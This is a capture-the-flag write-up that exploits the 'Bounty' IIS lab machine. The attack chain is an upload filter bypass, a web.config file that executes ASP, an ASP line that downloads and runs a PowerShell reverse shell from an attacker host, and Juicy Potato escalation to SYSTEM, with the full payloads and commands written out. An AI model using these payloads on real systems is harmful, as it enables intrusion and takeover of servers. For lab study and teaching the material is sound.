Basic info

Port scan

Only port 80 is open:

$ nmap -sC -sV -Pn 10.10.10.93
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-29 15:08 CST
Nmap scan report for 10.10.10.93
Host is up (0.070s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.47 seconds

80

The site is just a single image:

Directory scan

Since the server is IIS, asp and aspx are added as extensions. Directory scan results:

➜  ~ gobuster dir -u http://10.10.10.93/ -w /usr/share/seclists/Discovery/Web-Content/common.txt  -x asp,aspx,html,txt -t 50

/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/transfer.aspx (Status: 200) [Size: 941]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]

transfer.aspx

A file upload form:

File upload

A normal upload test shows the file is stored under its original name, without being renamed:

aspx

An .aspx file cannot be uploaded directly, but a null-byte (%00) truncation of the filename gets it past the extension check:

It is not executed by IIS though. Further testing shows that .config files are accepted:

web.config

According to this article, ASP code can be embedded in a web.config, which IIS will then execute as a script:

Upload it and request it, and the code runs:
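The web.config the text refers to, written out here as an added example (it is not the page's own file, and it is an assumption that the linked article describes this standard handler-mapping technique). The handler entry maps *.config to asp.dll so IIS runs the uploaded web.config as classic ASP, the requestFiltering changes stop IIS from refusing to serve the file, and the ASP sits inside an XML comment so the file still parses as valid configuration. Requesting the uploaded file (assumed to land at /uploadedfiles/web.config) should return 3.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <!-- Run *.config through the classic ASP ISAPI handler. -->
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <!-- By default IIS refuses to serve .config files and the web.config segment; lift both. -->
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
```

The Response.write calls before and after the expression close and reopen the HTML comment, so the browser shows only the "3"; once that works, the body of the comment can be swapped for the WScript.Shell reverse-shell block used below.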

reverse shell

So the ASP can simply launch a PowerShell reverse shell:

<%@ Language=VBScript %>
<%
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.10:7777/Invoke-PowerShellTcp.ps1')")
%>

user flag

user.txt is a hidden file on merlin's desktop:

Privilege escalation enumeration

Run systeminfo and look for kernel exploits; whoami /priv also shows SeImpersonatePrivilege (enabled) and SeAssignPrimaryTokenPrivilege in the token, so Juicy Potato works too. Candidates:

  • ms10_092_schelevator
  • ms16_014_wmi_recv_notif
  • Juicy Potato
PS C:\temp> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\temp>
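A small triage helper for the whoami /priv output above, added here as an example (it is not part of the original writeup): it parses the table and reports which Potato-abusable privileges the token holds. The sample input is a copy of the output captured above. The point it makes is that SeAssignPrimaryTokenPrivilege showing as Disabled does not rule it out: the privilege is present in the token, and JuicyPotato enables it itself before use, so presence is what matters.

```python
import re

# Constructed sample: the `whoami /priv` output captured on the box above.
WHOAMI_PRIV_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges Juicy Potato (and the other *Potato variants) can abuse.
# Either one is enough; the tool enables it via AdjustTokenPrivileges,
# so a "Disabled" state in whoami output is not a blocker.
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# One data row: privilege name, free-text description, then Enabled/Disabled.
LINE_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: (description, enabled)} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            name, desc, state = m.groups()
            privs[name] = (desc, state == "Enabled")
    return privs


def potato_candidates(privs):
    """Potato-abusable privileges present in the token, enabled or not."""
    return sorted(POTATO_PRIVS & set(privs))


def escalation_hint(privs):
    """Suggest the escalation route the page follows, based on the parsed token."""
    cands = potato_candidates(privs)
    if cands:
        return "JuicyPotato (%s)" % ", ".join(cands)
    return "no impersonation privilege in token; fall back to kernel exploits from systeminfo"


if __name__ == "__main__":
    parsed = parse_whoami_priv(WHOAMI_PRIV_OUTPUT)
    for name, (desc, enabled) in parsed.items():
        print("%-30s %-8s %s" % (name, "Enabled" if enabled else "Disabled", desc))
    print(escalation_hint(parsed))
```

Paste the real whoami /priv output into WHOAMI_PRIV_OUTPUT (or read it from a file) when using this on a new foothold; the regex only needs the name and state columns, so collapsed whitespace in a copied shell log still parses.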

Juicy Potato privilege escalation

Juicy Potato gets SYSTEM:

# transfer the files over SMB from the attacker share
net use \\10.10.14.10\miao
copy \\10.10.14.10\miao\JuicyPotato.exe .
copy \\10.10.14.10\miao\rev.bat .

# rev.bat: the program JuicyPotato runs as SYSTEM, which pulls the same PowerShell reverse shell
powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.10:7777/Invoke-PowerShellTcp.ps1')

./JuicyPotato.exe -t * -p rev.bat -l 4444

root flag

root.txt on the Administrator desktop:

References